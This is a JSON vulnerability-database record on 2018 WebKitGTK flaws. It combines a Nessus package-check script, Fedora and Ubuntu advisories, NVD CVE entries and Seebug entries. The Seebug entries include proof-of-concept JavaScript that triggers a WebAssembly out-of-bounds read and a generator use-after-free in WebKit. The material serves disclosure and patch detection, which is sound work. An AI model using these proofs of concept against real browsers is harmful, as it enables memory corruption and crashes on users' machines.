script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:webkit2gtk-4_0-injected-bundles-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:webkit2gtk3-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:webkit2gtk3-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:webkit2gtk3-plugin-process-gtk2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:webkit2gtk3-plugin-process-gtk2-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:42.3\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/10/25\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/10/26\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018-2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE42\\.3)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"42.3\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE42.3\", 
reference:\"libjavascriptcoregtk-4_0-18-2.20.3-11.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"libjavascriptcoregtk-4_0-18-debuginfo-2.20.3-11.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"libwebkit2gtk-4_0-37-2.20.3-11.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"libwebkit2gtk-4_0-37-debuginfo-2.20.3-11.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"libwebkit2gtk3-lang-2.20.3-11.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"typelib-1_0-JavaScriptCore-4_0-2.20.3-11.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"typelib-1_0-WebKit2-4_0-2.20.3-11.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"typelib-1_0-WebKit2WebExtension-4_0-2.20.3-11.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"webkit-jsc-4-2.20.3-11.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"webkit-jsc-4-debuginfo-2.20.3-11.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"webkit2gtk-4_0-injected-bundles-2.20.3-11.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"webkit2gtk-4_0-injected-bundles-debuginfo-2.20.3-11.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"webkit2gtk3-debugsource-2.20.3-11.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"webkit2gtk3-devel-2.20.3-11.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"webkit2gtk3-plugin-process-gtk2-2.20.3-11.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"webkit2gtk3-plugin-process-gtk2-debuginfo-2.20.3-11.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", cpu:\"x86_64\", reference:\"libjavascriptcoregtk-4_0-18-32bit-2.20.3-11.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", cpu:\"x86_64\", reference:\"libjavascriptcoregtk-4_0-18-debuginfo-32bit-2.20.3-11.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", cpu:\"x86_64\", reference:\"libwebkit2gtk-4_0-37-32bit-2.20.3-11.1\") ) flag++;\nif 
( rpm_check(release:\"SUSE42.3\", cpu:\"x86_64\", reference:\"libwebkit2gtk-4_0-37-debuginfo-32bit-2.20.3-11.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"libjavascriptcoregtk-4_0-18 / libjavascriptcoregtk-4_0-18-32bit / etc\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "fedora": [{"lastseen": "2020-12-21T08:17:54", "bulletinFamily": "unix", "cvelist": ["CVE-2018-11646", "CVE-2018-4190", "CVE-2018-4199", "CVE-2018-4218", "CVE-2018-4222", "CVE-2018-4232", "CVE-2018-4233", "CVE-2018-4246"], "description": "WebKitGTK+ is the port of the portable web rendering engine WebKit to the GTK+ platform. This package contains WebKitGTK+ for GTK+ 3. ", "modified": "2018-06-29T08:06:09", "published": "2018-06-29T08:06:09", "id": "FEDORA:EC42160A1040", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 27 Update: webkitgtk4-2.20.3-1.fc27", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-12-21T08:17:54", "bulletinFamily": "unix", "cvelist": ["CVE-2018-11646", "CVE-2018-4190", "CVE-2018-4199", "CVE-2018-4218", "CVE-2018-4222", "CVE-2018-4232", "CVE-2018-4233", "CVE-2018-4246"], "description": "WebKitGTK+ is the port of the portable web rendering engine WebKit to the GTK+ platform. This package contains WebKit2 based WebKitGTK+ for GTK+ 3. 
", "modified": "2018-06-16T20:20:25", "published": "2018-06-16T20:20:25", "id": "FEDORA:A7C5B60D2E0C", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 28 Update: webkit2gtk3-2.20.3-1.fc28", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "ubuntu": [{"lastseen": "2020-07-02T11:38:27", "bulletinFamily": "unix", "cvelist": ["CVE-2018-4199", "CVE-2018-4190", "CVE-2018-12293", "CVE-2018-4233", "CVE-2018-4222", "CVE-2018-4218", "CVE-2018-4232"], "description": "A large number of security issues were discovered in the WebKitGTK+ Web and \nJavaScript engines. If a user were tricked into viewing a malicious \nwebsite, a remote attacker could exploit a variety of issues related to web \nbrowser security, including cross-site scripting attacks, denial of service \nattacks, and arbitrary code execution.", "edition": 6, "modified": "2018-06-18T00:00:00", "published": "2018-06-18T00:00:00", "id": "USN-3687-1", "href": "https://ubuntu.com/security/notices/USN-3687-1", "title": "WebKitGTK+ vulnerabilities", "type": "ubuntu", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "cve": [{"lastseen": "2020-12-09T20:25:32", "description": "webkitFaviconDatabaseSetIconForPageURL and webkitFaviconDatabaseSetIconURLForPageURL in UIProcess/API/glib/WebKitFaviconDatabase.cpp in WebKit, as used in WebKitGTK+ through 2.21.3, mishandle an unset pageURL, leading to an application crash.", "edition": 6, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 3.6}, "published": "2018-06-01T13:29:00", "title": "CVE-2018-11646", "type": "cve", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": 
{"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-11646"], "modified": "2019-10-03T00:03:00", "cpe": ["cpe:/a:webkitgtk:webkitgtk\\+:2.21.3"], "id": "CVE-2018-11646", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-11646", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}, "cpe23": ["cpe:2.3:a:webkitgtk:webkitgtk\\+:2.21.3:*:*:*:*:*:*:*"]}, {"lastseen": "2020-12-09T20:25:43", "description": "An issue was discovered in certain Apple products. iOS before 11.4 is affected. Safari before 11.1.1 is affected. iCloud before 7.5 on Windows is affected. iTunes before 12.7.5 on Windows is affected. tvOS before 11.4 is affected. watchOS before 4.3.1 is affected. The issue involves the \"WebKit\" component. 
It allows remote attackers to execute arbitrary code via a crafted web site that leverages a getWasmBufferFromValue out-of-bounds read during WebAssembly compilation.", "edition": 12, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-06-08T18:29:00", "title": "CVE-2018-4222", "type": "cve", "cwe": ["CWE-125"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-4222"], "modified": "2019-03-07T17:03:00", "cpe": ["cpe:/o:canonical:ubuntu_linux:18.04", "cpe:/o:canonical:ubuntu_linux:17.10", "cpe:/o:canonical:ubuntu_linux:16.04"], "id": "CVE-2018-4222", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-4222", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:canonical:ubuntu_linux:17.10:*:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:16.04:*:*:*:lts:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:18.04:*:*:*:lts:*:*:*"]}, {"lastseen": "2020-12-09T20:25:43", "description": "An issue was discovered in certain Apple products. iOS before 11.4 is affected. Safari before 11.1.1 is affected. iCloud before 7.5 on Windows is affected. 
iTunes before 12.7.5 on Windows is affected. tvOS before 11.4 is affected. watchOS before 4.3.1 is affected. The issue involves the \"WebKit\" component. It allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site.", "edition": 12, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-06-08T18:29:00", "title": "CVE-2018-4233", "type": "cve", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-4233"], "modified": "2019-06-02T17:29:00", "cpe": ["cpe:/o:canonical:ubuntu_linux:18.04", "cpe:/o:canonical:ubuntu_linux:17.10", "cpe:/o:canonical:ubuntu_linux:16.04"], "id": "CVE-2018-4233", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-4233", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:canonical:ubuntu_linux:17.10:*:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:16.04:*:*:*:lts:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:18.04:*:*:*:lts:*:*:*"]}, {"lastseen": "2020-12-09T20:25:43", "description": "An issue was discovered in certain Apple 
products. iOS before 11.4 is affected. Safari before 11.1.1 is affected. iCloud before 7.5 on Windows is affected. iTunes before 12.7.5 on Windows is affected. tvOS before 11.4 is affected. The issue involves the \"WebKit\" component. It allows remote attackers to execute arbitrary code or cause a denial of service (buffer overflow and application crash) via a crafted web site.", "edition": 12, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-06-08T18:29:00", "title": "CVE-2018-4199", "type": "cve", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-4199"], "modified": "2019-03-07T21:09:00", "cpe": ["cpe:/o:canonical:ubuntu_linux:18.04", "cpe:/o:canonical:ubuntu_linux:17.10", "cpe:/o:canonical:ubuntu_linux:16.04"], "id": "CVE-2018-4199", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-4199", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:canonical:ubuntu_linux:17.10:*:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:16.04:*:*:*:lts:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:18.04:*:*:*:lts:*:*:*"]}, {"lastseen": 
"2020-12-09T20:25:43", "description": "An issue was discovered in certain Apple products. iOS before 11.4 is affected. Safari before 11.1.1 is affected. iCloud before 7.5 on Windows is affected. iTunes before 12.7.5 on Windows is affected. tvOS before 11.4 is affected. The issue involves the \"WebKit\" component. It allows remote attackers to overwrite cookies via a crafted web site.", "edition": 13, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "baseScore": 4.3, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 1.4}, "published": "2018-06-08T18:29:00", "title": "CVE-2018-4232", "type": "cve", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-4232"], "modified": "2019-10-03T00:03:00", "cpe": ["cpe:/o:canonical:ubuntu_linux:18.04", "cpe:/o:canonical:ubuntu_linux:17.10", "cpe:/o:canonical:ubuntu_linux:16.04"], "id": "CVE-2018-4232", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-4232", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "cpe23": ["cpe:2.3:o:canonical:ubuntu_linux:17.10:*:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:16.04:*:*:*:lts:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:18.04:*:*:*:lts:*:*:*"]}, 
{"lastseen": "2020-12-09T20:25:43", "description": "An issue was discovered in certain Apple products. iOS before 11.4 is affected. Safari before 11.1.1 is affected. iCloud before 7.5 on Windows is affected. iTunes before 12.7.5 on Windows is affected. tvOS before 11.4 is affected. watchOS before 4.3.1 is affected. The issue involves the \"WebKit\" component. It allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site that triggers an @generatorState use-after-free.", "edition": 13, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-06-08T18:29:00", "title": "CVE-2018-4218", "type": "cve", "cwe": ["CWE-416"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-4218"], "modified": "2019-10-03T00:03:00", "cpe": ["cpe:/o:canonical:ubuntu_linux:18.04", "cpe:/o:canonical:ubuntu_linux:17.10", "cpe:/o:canonical:ubuntu_linux:16.04"], "id": "CVE-2018-4218", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-4218", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": 
["cpe:2.3:o:canonical:ubuntu_linux:17.10:*:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:16.04:*:*:*:lts:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:18.04:*:*:*:lts:*:*:*"]}, {"lastseen": "2020-12-09T20:25:43", "description": "An issue was discovered in certain Apple products. iOS before 11.4 is affected. Safari before 11.1.1 is affected. iCloud before 7.5 on Windows is affected. iTunes before 12.7.5 on Windows is affected. tvOS before 11.4 is affected. The issue involves the \"WebKit\" component. It allows remote attackers to obtain sensitive credential information that is transmitted during a CSS mask-image fetch.", "edition": 13, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-06-08T18:29:00", "title": "CVE-2018-4190", "type": "cve", "cwe": ["CWE-522"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-4190"], "modified": "2019-10-03T00:03:00", "cpe": ["cpe:/o:canonical:ubuntu_linux:18.04", "cpe:/o:canonical:ubuntu_linux:17.10", "cpe:/o:canonical:ubuntu_linux:16.04"], "id": "CVE-2018-4190", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-4190", "cvss": {"score": 4.3, 
"vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:o:canonical:ubuntu_linux:17.10:*:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:16.04:*:*:*:lts:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:18.04:*:*:*:lts:*:*:*"]}], "seebug": [{"lastseen": "2018-06-10T09:46:29", "description": "There is an out-of-bounds read when compiling WebAssembly source buffers in WebKit. When a source buffer is compiled, it is first copied into a read-only buffer by the function getWasmBufferFromValue. This function returns the code buffer as follows:\r\n```\r\nreturn arrayBufferView ? static_cast<uint8_t*>(arrayBufferView->vector()) : static_cast<uint8_t*>(arrayBuffer->impl()->data());\r\n```\r\nIf the source buffer is a view (DataView or TypedArray), arrayBufferView->vector() is returned. The vector() method returns the start of the data in the buffer, including any offset. However, the function createSourceBufferFromValue copies the output of this function as follows:\r\n```\r\nmemcpy(result.data(), data + byteOffset, byteSize);\r\n```\r\nThis means that if the buffer is a view, the offset is added to the buffer twice before this is copied. This could allow memory off the heap to be read out of the source buffer, either through parsing exceptions or data sections when they are copied. 
A minimal PoC for the issue is:\r\n```\r\nvar b2 = new ArrayBuffer(1000);\r\nvar view = new Int8Array(b2, 700);\r\nvar mod = new WebAssembly.Module(a);\r\n```\r\n\r\nAn HTML file that consistently crashes Safari is attached.", "published": "2018-06-08T00:00:00", "type": "seebug", "title": "WebKit: Info leak in WebAssembly Compilation(CVE-2018-4222)", "bulletinFamily": "exploit", "cvelist": ["CVE-2018-4222"], "modified": "2018-06-08T00:00:00", "id": "SSV:97335", "href": "https://www.seebug.org/vuldb/ssvid-97335", "sourceData": "\n <html><body><script>\r\nfor(var q = 0; q < 100; q++){\r\nvar i = Math.random();\r\ni = Math.round(i*0x20000000);\r\ni = Math.abs(i);\r\nvar b2 = new Uint8Array( i);\r\nconsole.log(\"i\" + i);\r\nvar j = Math.random();\r\nj = j*i;\r\nj = Math.round(j);\r\nj = Math.abs(j);\r\nconsole.log(\"j\"+j)\r\nvar view2 = new DataView(b2.buffer,j);\r\ntry{\r\nvar mod = new WebAssembly.Module(view2);\r\n}catch(e){\r\nconsole.log(e);\r\n}\r\n}\r\n</script></body></html>\n ", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-97335"}, {"lastseen": "2018-06-08T07:11:41", "description": "In WebKit, resuming a generator is implemented in JavaScript. An internal object property, @generatorState is used to prevent recursion within generators. In GeneratorPrototype.js, the state is checked by calling:\r\n```\r\n var state = this.@generatorState;\r\n```\r\nand set by calling:\r\n```\r\n generator.@generatorState = @GeneratorStateExecuting;\r\n```\r\n\r\nChecking that the @generator property is set is also used in place of type checking the generator.\r\n\r\nTherefore, if Generator.next is called on an object with a prototype that is a Generator, it will pass the type check, and the internal properties of the Generator prototype will be used to resume the generator. However, when @generatorState, it will be set as an own property on the object, not the prototype. 
This allows the creation of non-Generator objects with the @generatorState set to completed.\r\n\r\nIt is then possible to bypass the recursion check by setting the prototype of one of these objects to a Generator, as the check will then get the object's @generatorState own property, meanwhile the other internal properties will come from the prototype.\r\n\r\nGenerators are not intended to allow recursion, so a reference to the scope is not maintained, leading to a use-after free.\r\n\r\nA minimal sample of the script causing this problem is below, and a full PoC is attached.\r\n```\r\nvar iterator;\r\n\r\nvar a = [];\r\n\r\nfunction* foo(index) {\r\n\r\n while (1) {\r\n var q = a.pop();\r\n if(q){\r\n \tq.__proto__ = iterator;\r\n \t q.next();\r\n }\r\n yield index++;\r\n }\r\n}\r\n\r\nfunction* foo2(){\r\n yield;\r\n}\r\n\r\nvar temp = foo2(0);\r\n\r\nfor(var i = 0; i < 10; i++){ // make a few objects with @generatorState set\r\n\tvar q = {};\r\n\tq.__proto__ = temp;\r\n\tq.next();\r\n\tq.__proto__ = {};\r\n\ta.push(q);\r\n\r\n}\r\n\r\niterator = foo(0);\r\n\r\nvar q = {};\r\nq.__proto__ = iterator;\r\nprint(q.next().value);\r\n```", "published": "2018-06-08T00:00:00", "type": "seebug", "title": "WebKit: Use-after-free when resuming generator(CVE-2018-4218)", "bulletinFamily": "exploit", "cvelist": ["CVE-2018-4218"], "modified": "2018-06-08T00:00:00", "id": "SSV:97334", "href": "https://www.seebug.org/vuldb/ssvid-97334", "sourceData": "\n <html><body><script>\r\nprint = console.log;\r\nprint(\"top\");\r\nvar iterator;\r\nvar o = function(){print(\"hello\")};\r\nvar a = [];\r\nfunction* foo(index) {\r\n //print(\"start\");\r\n\r\n while (1) {\r\n //if(index == 77){\r\n // o = 0;\r\n // gc(); \r\n//\tindex = 2;\r\n // var a = [1, 2, 3, 4];\r\n\t//yield 9;\r\n //print(\"a vale \" + a[0]);\r\n //}\r\n //if(index == 1){\r\n //index = 77;\r\n // print(\"INTERNAL CALL\")\r\n // iterator.next();\r\n //index++;\r\n\r\n //}\r\n //var b = [1, 2, 3, 4];\r\n var q = 
a.pop();\r\n if(q){\r\n print(\"here1\");\r\n q.__proto__ = iterator;\r\n q.next();\r\n }\r\n yield index++;\r\n //print(\"bval\" + b[0]);\r\n }\r\n}\r\n\r\nfunction* foo2(){\r\n\r\n yield;\r\n\r\n}\r\n\r\nvar temp = foo2(0);\r\n\r\nfor(var i = 0; i < 10; i++){\r\n\r\n\tvar q = {};\r\n\tq.__proto__ = temp;\r\n\tq.next();\r\n\tq.__proto__ = {};\r\n\ta.push(q);\r\n\r\n}\r\n//print(a);\r\niterator = foo(0);\r\n\r\n\r\n// expected output: 0\r\n\r\n\r\n\r\n\r\no.__proto__ = iterator;\r\n//print(\"FIRST CALL\")\r\n//print(o.next().value);\r\n//print(\"SECOND CALL\")\r\n//print(o.next().value);\r\n//print(\"THIRD CALL\")\r\n\r\nfor(var i = 0; i < 10; i++){\r\nvar q = {};\r\nq.__proto__ = iterator;\r\nprint(q.next(\"hello\").value);\r\n}\r\n\r\n//print(\"FOURTH CALL\")\r\n//print(iterator.next().value);\r\no();\r\n</script></body></html>\n ", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-97334"}], "apple": [{"lastseen": "2020-12-24T20:41:58", "bulletinFamily": "software", "cvelist": ["CVE-2018-4188", "CVE-2018-4205", "CVE-2018-4199", "CVE-2018-4190", "CVE-2018-4277", "CVE-2018-4233", "CVE-2018-4222", "CVE-2018-4192", "CVE-2018-4201", "CVE-2018-4218", "CVE-2018-4246", "CVE-2018-4214", "CVE-2018-4247", "CVE-2018-4232"], "description": "## About Apple security updates\n\nFor our customers' protection, Apple doesn't disclose, discuss, or confirm security issues until an investigation has occurred and patches or releases are available. Recent releases are listed on the [Apple security updates](<https://support.apple.com/kb/HT201222>) page.\n\nFor more information about security, see the [Apple Product Security](<https://support.apple.com/kb/HT201220>) page. 
